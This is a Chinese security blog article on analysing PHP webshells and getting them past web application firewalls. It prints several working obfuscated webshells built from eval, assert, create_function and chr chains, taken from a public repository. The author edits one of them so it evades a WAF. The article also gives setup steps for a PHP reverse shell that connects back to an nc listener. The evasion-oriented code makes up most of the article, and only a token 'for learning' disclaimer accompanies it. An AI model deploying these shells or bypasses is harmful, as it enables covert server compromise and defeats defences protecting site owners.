Loading
0

php webshell分析和绕过waf技巧

' ZhaoHuan 2016年12月11日 技术文章 367 0

混淆技术
上面的方法虽然过了waf,但是我们人工一看就知道有问题,所以我们还需要一些混淆技术来隐藏webshell。首先我们来认识一下几个常用功能。
eval() :把字符串作为PHP代码执行
assert() :判断一个表达式是否成立,直接传入字符串会当做 PHP 代码来执行
base64() :使用base64对数据进行编码
gzdeflate() :对数据进行Deflate压缩,gzinflate()解压缩
str_rot13() :对字符串执行 ROT13 转换
回调函数
这种办法国内我是看了phithon的介绍,不过这里我肯定要介绍是最新能绕waf的函数。
create_function()

$args = "hui";
$code = "a;}$_POST['bar'];/*";
echo create_function('$args',$code);
?>
这样构造可以把前面的函数体闭合,再把后面的注释掉,这样就相当于执行了。

eval($_POST[bar])
使用system函数执行net user命令:

反弹shell
这里给大家介绍一个php反弹shell的脚本。
下载地址:http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
使用方法:
第一步,填写需要反弹到的IP地址和端口以及需要执行的shell命令。
$ip = '127.0.0.1';  // IP地址
$port = 1234;       // 端口
$shell = 'net user'; //需要执行的命令
然后我使用nc监听端口1234:

nc -v -n -l -p 1234
访问php文件后,查看nc监听结果,发现命令成功执行,结果反弹。

waf没有扫描到。
那些年强悍的WebShell分析
在Github上有个项目收集了很多的WebShell,这里我们拿出几个我认为比较强悍的webshell分析一下。
项目地址:https://github.com/tennc/webshell
利用404页面隐藏PHP木马
webshell/php/404.php
这里主要的代码如下:

eval(gzinflate(base64_decode($code)));
木马代码被编码压缩在$code变量中,验证密码是否正确,正确就解压执行,这里密码经过了三次md5加密。

过某waf的webshell
webshell/php/bypass-safedog-2016-08-29.php

$a=md5('a').'
';
$poc=substr($a,14,1).chr(115).chr(115).substr($a,22,1).chr(114).chr(116);
$poc($_GET['a']);
?>
利用a的md5值取出了a和e,配合chr函数,构造出assert。
利用演示:

zone_hackbar.php
webshell/php/zone_hackbar.php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];
if(isset($s22)){eval($s21($s22));}
?>
这个webshell也是通过隐藏关键字,$s21就是base64解密函数,$s22就是接收POST数据。不过某waf对eval可是很敏感的,直接报警。

不要紧,我们修改一下就可以了,用assert,不需要base64加密了。

$sF="PCT4BA6ODSE_";
$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];
if(isset($s22)){assert($s22);}
?>
这次就没有扫描到了,看看使用有没有错。

过各大杀软的pHp一句话
webshell/php/过各大杀软的pHp一句话.php
$_uU=chr(99).chr(104).chr(114);
$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);
$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);
$_=$_fF("",$_cC);@$_();
?>
看起来没什么,其实就是先构造了chr这个字符串,然后利用chr函数分别构造了eval($_POST[1]);和create_function。
最后就是执行:

create_function("",eval($_POST[1]););
不过现在某waf对chr可是很敏感滴。立马被拦截了。

分页阅读: 1 2 3
【声明】:8090安全小组门户(https://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们:邮箱hack@ddos.kim,我们会在最短的时间内进行处理。